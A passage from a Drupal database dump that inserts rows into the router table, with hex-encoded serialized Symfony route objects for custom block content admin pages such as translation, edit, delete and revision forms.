3a343a2274797065223b733a32303a22656e746974793a626c6f636b5f636f6e74656e74223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39373a227b5e2f61646d696e2f636f6e74656e742f626c6f636b2f283f503c626c6f636b5f636f6e74656e743e5b5e2f5d2b2b292f7472616e736c6174696f6e732f65646974283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31383a222f7472616e736c6174696f6e732f65646974223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a22626c6f636b5f636f6e74656e74223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a35393b733a31343a227061747465726e4f75746c696e65223b733a34303a222f61646d696e2f636f6e74656e742f626c6f636b2f252f7472616e736c6174696f6e732f65646974223b733a383a226e756d5061727473223b693a373b7d7d, 7);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('entity.block_content.content_translation_overview', '/admin/content/block/{block_content}/translations', '/admin/content/block/%/translations', 29, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34393a222f61646d696e2f636f6e74656e742f626c6f636b2f7b626c6f636b5f636f6e74656e747d2f7472616e736c6174696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37373a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a6f76657276696577223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31383a22626c6f636b5f636f6e74656e742e76696577223b733a33363a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6f76657276696577223b733a31333a22626c6f636b5f636f6e74656e74223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31333a22626c6f636b5f636f6e74656e74223b613a333a7b733a343a2274797065223b733a32303a22656e746974793a626c6f636b5f636f6e74656e74223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a33353a22636f6e74656e745f7472616e736c6174696f6e2e6f766572766965775f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36363a227b5e2f61646d696e2f636f6e74656e742f626c6f636b2f283f503c626c6f636b5f636f6e74656e743e5b5e2f5d2b2b292f7472616e736c6174696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f7472616e736c6174696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a22626c6f636b5f636f6e74656e74223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a32393b733a31343a227061747465726e4f75746c696e65223b733a33353a222f61646d696e2f636f6e74656e742f626c6f636b2f252f7472616e736c6174696f6e73223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.block_content.delete_form', '/admin/content/block/{block_content}/delete', '/admin/content/block/%/delete', 29, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34333a222f61646d696e2f636f6e74656e742f626c6f636b2f7b626c6f636b5f636f6e74656e747d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32303a22626c6f636b5f636f6e74656e742e64656c657465223b733a363a225f7469746c65223b733a363a2244656c657465223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a32303a22626c6f636b5f636f6e74656e742e64656c657465223b733a31333a22626c6f636b5f636f6e74656e74223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a22626c6f636b5f636f6e74656e74223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a626c6f636b5f636f6e74656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35373a227b5e2f61646d696e2f636f6e74656e742f626c6f636b2f283f503c626c6f636b5f636f6e74656e743e5c642b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a31333a22626c6f636b5f636f6e74656e74223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a32393b733a31343a227061747465726e4f75746c696e65223b733a32393a222f61646d696e2f636f6e74656e742f626c6f636b2f252f64656c657465223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.block_content.delete_form.bc', '/block/{block_content}/delete', '/block/%/delete', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32393a222f626c6f636b2f7b626c6f636b5f636f6e74656e747d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a36393a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a656469745265646972656374223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a32303a22626c6f636b5f636f6e74656e742e64656c657465223b733a31333a22626c6f636b5f636f6e74656e74223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a22626c6f636b5f636f6e74656e74223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a626c6f636b5f636f6e74656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34333a227b5e2f626c6f636b2f283f503c626c6f636b5f636f6e74656e743e5c642b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a31333a22626c6f636b5f636f6e74656e74223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f626c6f636b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a31353a222f626c6f636b2f252f64656c657465223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.block_content.edit_form', '/admin/content/block/{block_content}', '/admin/content/block/%', 14, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33363a222f61646d696e2f636f6e74656e742f626c6f636b2f7b626c6f636b5f636f6e74656e747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31323a225f656e746974795f666f726d223b733a31383a22626c6f636b5f636f6e74656e742e65646974223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a32303a22626c6f636b5f636f6e74656e742e757064617465223b733a31333a22626c6f636b5f636f6e74656e74223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a22626c6f636b5f636f6e74656e74223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a626c6f636b5f636f6e74656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35303a227b5e2f61646d696e2f636f6e74656e742f626c6f636b2f283f503c626c6f636b5f636f6e74656e743e5c642b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a31333a22626c6f636b5f636f6e74656e74223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31343b733a31343a227061747465726e4f75746c696e65223b733a32323a222f61646d696e2f636f6e74656e742f626c6f636b2f25223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.block_content.edit_form.bc', '/block/{block_content}', '/block/%', 2, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32323a222f626c6f636b2f7b626c6f636b5f636f6e74656e747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a36393a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a656469745265646972656374223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a32303a22626c6f636b5f636f6e74656e742e757064617465223b733a31333a22626c6f636b5f636f6e74656e74223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a22626c6f636b5f636f6e74656e74223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a626c6f636b5f636f6e74656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33363a227b5e2f626c6f636b2f283f503c626c6f636b5f636f6e74656e743e5c642b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a31333a22626c6f636b5f636f6e74656e74223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f626c6f636b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a323b733a31343a227061747465726e4f75746c696e65223b733a383a222f626c6f636b2f25223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('entity.block_content.field_ui_fields', '/admin/structure/block-content/manage/{block_content_type}/fields', '/admin/structure/block-content/manage/%/fields', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36353a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c6473223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a36323a225c44727570616c5c6669656c645f75695c436f6e74726f6c6c65725c4669656c64436f6e6669674c697374436f6e74726f6c6c65723a3a6c697374696e67223b733a363a225f7469746c65223b733a31333a224d616e616765206669656c6473223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a33313a2261646d696e697374657220626c6f636b5f636f6e74656e74206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38333a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c6473247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c6473223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.block_content.field_ui_fields.bc', '/admin/structure/block/block-content/manage/{block_content_type}/fields', '/admin/structure/block/block-content/manage/%/fields', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37313a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f6669656c6473223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b733a363a225f7469746c65223b733a31333a224d616e616765206669656c6473223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a2262756e646c65223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a33313a2261646d696e697374657220626c6f636b5f636f6e74656e74206669656c6473223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a393a225f6669656c645f7569223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38393a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f6669656c6473247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35323a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f6669656c6473223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.block_content.revision_delete_form', '/admin/content/block/{block_content}/revision/{block_content_revision}/delete', '/admin/content/block/%/revision/%/delete', 117, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37373a222f61646d696e2f636f6e74656e742f626c6f636b2f7b626c6f636b5f636f6e74656e747d2f7265766973696f6e2f7b626c6f636b5f636f6e74656e745f7265766973696f6e7d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32393a22626c6f636b5f636f6e74656e742e7265766973696f6e2d64656c657465223b733a363a225f7469746c65223b733a31353a2244656c657465207265766973696f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a33383a22626c6f636b5f636f6e74656e745f7265766973696f6e2e64656c657465207265766973696f6e223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a323a7b733a31333a22626c6f636b5f636f6e74656e74223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a626c6f636b5f636f6e74656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b613a323a7b733a343a2274797065223b733a32393a22656e746974795f7265766973696f6e3a626c6f636b5f636f6e74656e74223b733a393a22636f6e766572746572223b733a33303a22706172616d636f6e7665727465722e656e746974795f7265766973696f6e223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130343a227b5e2f61646d696e2f636f6e74656e742f626c6f636b2f283f503c626c6f636b5f636f6e74656e743e5b5e2f5d2b2b292f7265766973696f6e2f283f503c626c6f636b5f636f6e74656e745f7265766973696f6e3e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a393a222f7265766973696f6e223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a22626c6f636b5f636f6e74656e74223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3131373b733a31343a227061747465726e4f75746c696e65223b733a34303a222f61646d696e2f636f6e74656e742f626c6f636b2f252f7265766973696f6e2f252f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.block_content.revision_revert_form', '/admin/content/block/{block_content}/revision/{block_content_revision}/revert', '/admin/content/block/%/revision/%/revert', 117, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37373a222f61646d696e2f636f6e74656e742f626c6f636b2f7b626c6f636b5f636f6e74656e747d2f7265766973696f6e2f7b626c6f636b5f636f6e74656e745f7265766973696f6e7d2f726576657274223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32393a22626c6f636b5f636f6e74656e742e7265766973696f6e2d726576657274223b733a363a225f7469746c65223b733a31353a22526576657274207265766973696f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32393a22626c6f636b5f636f6e74656e745f7265766973696f6e2e726576657274223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a323a7b733a31333a22626c6f636b5f636f6e74656e74223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a626c6f636b5f636f6e74656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b613a323a7b733a343a2274797065223b733a32393a22656e746974795f7265766973696f6e3a626c6f636b5f636f6e74656e74223b733a393a22636f6e766572746572223b733a33303a22706172616d636f6e7665727465722e656e746974795f7265766973696f6e223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d65732